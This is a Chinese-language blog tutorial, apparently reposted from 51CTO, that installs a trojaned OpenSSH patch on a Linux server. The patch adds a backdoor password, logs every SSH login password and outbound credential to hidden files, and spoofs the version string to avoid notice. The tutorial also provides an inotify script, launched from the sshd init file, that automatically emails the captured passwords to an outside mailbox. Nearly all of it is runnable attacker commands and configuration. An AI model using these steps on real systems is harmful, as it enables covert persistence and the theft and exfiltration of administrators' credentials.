自動劫持root密碼并轉發密碼到郵箱
一:實驗内容
二:劫持root密碼的過程:
過程1:如上圖所示。黑客登入到sshd服務系統之後會用木馬更新檔檔案将原來的sshd服務替換掉,并且留下後門密碼,此後門密碼還可以直接登入系統。
過程2:網絡管理者登入到系統之後,所登入的路徑已經不是原來真實安全的路徑了,是由黑客替換掉的sshd服務和路徑。在此登入之後,管理者修改賬号密碼或者其他操作都會被記錄下來,自動發給黑客指定的郵箱。
過程3:有的時候時候網絡管理者登入到sshd服務之後還會在此伺服器下進行遠端登入到其他伺服器。在此後門檔案中不僅僅會将網絡管理者的賬号密碼給記錄下來還會将管理者遠端到其他伺服器的張慧密碼也給記錄下來,這樣就可以完成一箭雙雕的意圖了。
三:實驗步驟
分析:想要劫持到root密碼,那麼首先就要可以登入到目标伺服器上,就用到了之前暴力破解的方法了,擷取其root密碼,登入之後,進行偷梁換柱,留下後門。此伺服器的管理者登入系統,所登入的程序是你所留下的後門程序。再此,管理者如果跟換密碼,後門就會将跟換的密碼以郵件的方式發給你。
上傳0x06-openssh-5.9p1.patch.tar.gz和openssh-5.9p1.tar.gz 到/tmp目錄
0x06-openssh-5.9p1.patch.tar.gz #就是木馬檔案
openssh-5.9p1.tar.gz #是sshd服務的真實服務
------------------------------------------------------------------
檢視ssh gcc 服務的版本與安裝軟體
1:檢視版本
[root@yu63 tmp]# ssh -v #檢視安裝前ssh版本
OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010
[root@yu63 tmp]# gcc -v #确認安裝gcc
gcc version 4.4.6 20110731 (Red Hat 4.4.6-3) (GCC)
分析:黑客在黑掉伺服器之後,肯定是想要長久讓此伺服器成為他的“殭屍電腦”,是以就要做到隐蔽性,任何可能不不能給管理者發現,是以黑客登入系統之後會此案檢視此伺服器的版本與自己的木馬伺服器的版本是否想符合,不符合就要修改木馬檔案。
2:解壓檔案
[root@yu63 tmp]# tar zxvf openssh-5.9p1.tar.gz
[root@yu63 tmp]# tar -zxvf 0x06-openssh-5.9p1.patch.tar.gz
分析:openssh-5.9p1 是真實的sshd服務解壓檔案,openssh-5.9p1.patch 是sshd服務的更新檔檔案,此檔案中包含木馬檔案,實驗的思路就是将openssh-5.9p1.patch更新檔木馬檔案替換openssh-5.9p1真實服務。
替換openssh-5.9p1
1)安裝openssh-5.9p1并打更新檔:
[root@yu63 tmp]# cd openssh-5.9p1.patch/ #進入到木馬檔案
[root@yu63 openssh-5.9p1.patch]# cp sshbd5.9p1.diff ../openssh-5.9p1 #将木馬更新檔檔案放進真實檔案中[root@yu63 openssh-5.9p1.patch]# cd ../openssh-5.9p1 #進入到真實檔案中
[root@yu63 openssh-5.9p1]# patch < sshbd5.9p1.diff #将拷貝過來的木馬更新檔檔案進行執行,打更新檔,
打更新檔就是修改或者替換原來的檔案
patching file auth.c #認證 ---會将認證内容替換掉
patching file auth-pam.c #認證 ---會将認證内容替換掉
patching file auth-passwd.c #認證 ---會将認證内容替換掉
patching file canohost.c
patching file includes.h
patching file log.c
patching file servconf.c #關于sshd服務端 替換掉
patching file sshconnect2.c #關于sshd連接配接 替換掉
patching file sshlogin.c #關于登入,把root密碼記錄下來,這裡就是後門
patching file version.h #關于版本 替換版本資訊
2)修改後門密碼和記錄root密碼的檔案夾目錄
[root@yu63 openssh-5.9p1]# vim /tmp/openssh-5.9p1/includes.h
找到:
#define ILOG "/tmp/ilog" //劫持并記錄登入到本機的使用者名和密碼
#define OLOG "/tmp/olog" //劫持并記錄從本機登入到其他伺服器上的使用者名和密碼
#define SECRETPW "apaajaboleh" //你後門密碼
改為:
#define ILOG "/usr/share/ifile"
#define OLOG "/usr/share/ofile"
#define SECRETPW "genal"
分析:後門密碼指的是你留下的一個登入密碼,即使管理者将登入密碼修改了,你依然可以用後門密碼來登入系統。
說明: 修改版本号
安裝後的版本為:
[root@yu63 ~]# ssh -v
OpenSSH_5.8p1 Debian-1ubuntu3p1, OpenSSL 1.0.0-fips 29 Mar 2010
原來系統的版本:
為了使用安後的版本和原系統的版本一樣,修改版本号:
[root@yu63 ~]# vim /tmp/openssh-5.9p1/version.h
改:
3 #define SSH_VERSION "OpenSSH_5.8p1 Debian-1ubuntu3"
5 #define SSH_PORTABLE "p1"
為:
#define SSH_VERSION " OpenSSH_5.3"
#define SSH_PORTABLE "p1"
對替換掉過來的木馬軟體進行安裝
1:)安裝環境:
[root@yu63 tmp]# yum install -y openssl openssl-devel pam-devel zlib zlib-devel
2)開始安裝:
[root@yu63 openssh-5.9p1]# ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5 檢視編譯環境
--prefix=/usr #指定安裝到/usr 目錄下
--sysconfdir=/etc/ssh #指定sshd服務配置檔案目錄
--with-pam #指定支援pam認證
--with-kerberos5 #指定支援kerberos認證
3)編譯安裝後門:
[root@yu63 openssh-5.9p1]# make -j 4 #編譯
[root@yu63 openssh-5.9p1]# make install #安裝
/usr/bin/install -c -m 0755 -s ssh /usr/bin/ssh #将之前的ssh指令換掉
/usr/bin/install -c -m 0755 -s scp /usr/bin/scp #将之前的scp指令換掉
........
rm -f /usr/bin/slogin #删除了之前的log
ln -s ./ssh /usr/bin/slogin
rm -f /usr/share/man/man1/slogin.1
ln -s ./ssh.1 /usr/share/man/man1/slogin.1
/etc/ssh/ssh_config already exists, install will not overwrite #對于之前的配置檔案不進行改變
/etc/ssh/sshd_config already exists, install will not overwrite #對于之前的配置檔案不進行改變
4)重新開機ssh:
[root@yu63 openssh-5.9p1]# service sshd restart
注:這裡用木馬檔案中的sshd相關檔案替換掉sshd的真實服務。
測試
測試1:遠端連接配接
1)測試前,先檢視一下:/usr/share/ifile
[root@yu63 ~]# ls /usr/share/ifile
ls: cannot access /usr/share/ifile: No such file or directory #在沒有遠端登入系統的時候是沒有記錄的
2)使用yu64用戶端遠端登入yu63
3)再次檢視:
測試2:修改root密碼:
1)修改root密碼
root@yu63 ~]# passwd
Changing password for user root.
New password: 456789
2)遠端連接配接yu63
2)檢視
測試3:當忘記劫持到的密碼時,使用後門密碼來登入系統
另外我們也可以使用後門密碼來登入root帳号:
[root@yu63 tmp]# cat /tmp/ofile
user:password@host --> root: [email protected]
自動發送郵件:這裡以QQ的smtp伺服器為例
分析:黑客為了時刻掌握“殭屍電腦”賬戶密碼資訊,會在這裡編寫一個郵件配置,會将記錄的資訊自動發發給黑客指定的郵件賬戶中,這樣即使管理者修改掉密碼或者賬戶資訊,黑客都會即使的收到管理者所修改的賬戶和密碼資訊。
1)Linux下通過外部SMTP發郵件
[root@yu63 ~]# vim /etc/mail.rc #在此檔案中間,随機找個位置插入以下内容:
set [email protected] smtp=smtp.qq.com
set smtp-auth-user=1273815479 smtp-auth-password=******** smtp-auth=login
注:
set [email protected] #指定發件人的郵箱,這裡我們就寫成和收件人的郵箱一樣。
set smtp-auth-user=1273815479 #寫自己發件人的郵箱帳号
smtp-auth-password=********#寫自己發件人的郵箱密碼
2)配置QQ郵箱,開啟pop3/smtp服務
<a href="http://s3.51cto.com/wyfs02/M00/89/CC/wKioL1gdT-SBEQmmAABZE26dD64111.png" target="_blank"></a>
<a href="http://s2.51cto.com/wyfs02/M01/89/CF/wKiom1gdT-WioVw-AABoWOV_67g678.png" target="_blank"></a>
測試:
[root@yu63 ~]# mail -s "demo title" [email protected] < /usr/share/ifile
#将劫持的檔案發到我的郵箱中
實作自動将劫持密碼發送到郵箱
1)安裝inotify:
[root@yu63 ~]# tar -zxvf inotify-tools-3.13.tar.gz
[root@yu63 ~]# cd inotify-tools-3.13
[root@yu63 inotify-tools-3.13]# ./configure檢查安裝環境
[root@yu63 inotify-tools-3.13]# make -j 4#make編譯,将源代碼編譯成二進制,可執行的檔案
[root@yu63 inotify-tools-3.13]# make install # 安裝
2)編寫觸發式自動發郵件腳本
[root@yu63 ~]# cat /bin/zipmail
#!/bin/bash
/usr/local/bin/inotifywait -mrq -e create,move,delete,modify /usr/share/ifile | while read a b c
do
ip=`ifconfig |grep inet| sed -n '1p'|awk '{print $2}'|awk -F ':' '{print $2}'`
mail -s $ip [email protected] < /usr/share/ifile
done
3)設定開機啟動zipmail腳本:
[root@yu63 ~]# vim /etc/init.d/sshd #在此檔案的最後“exit $RETVAL” 前插入:
/bin/zipmail &
exit $RETVAL
[root@yu63 ~]# echo aaaaa < /usr/share/ifile
[root@yu63 ~]# service sshd restart
<a href="http://s3.51cto.com/wyfs02/M02/89/CC/wKioL1gdUALREWa2AABPXaGPzFc374.png" target="_blank"></a>
本文轉自 于學康 51CTO部落格,原文連結:http://blog.51cto.com/blxueyuan/1869718,如需轉載請自行聯系原作者